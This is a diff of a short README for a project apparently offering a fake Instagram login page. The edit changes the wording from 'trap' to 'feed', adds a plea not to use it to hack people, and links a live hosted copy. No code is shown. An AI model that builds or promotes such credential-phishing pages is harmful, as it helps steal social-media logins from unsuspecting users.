jonelorri/Instagram_login/README.md

 # Instagram-login

-This project is a fully functional Instagram Login trap.
+This project is a fully functional Instagram Login feed.
-**I just made it for fun, please dont use it.**
+**I just made it for fun, please dont use it to hack other people.**

 Here you can see my own webpage -> https://ig-login.jonelorriaga.repl.co/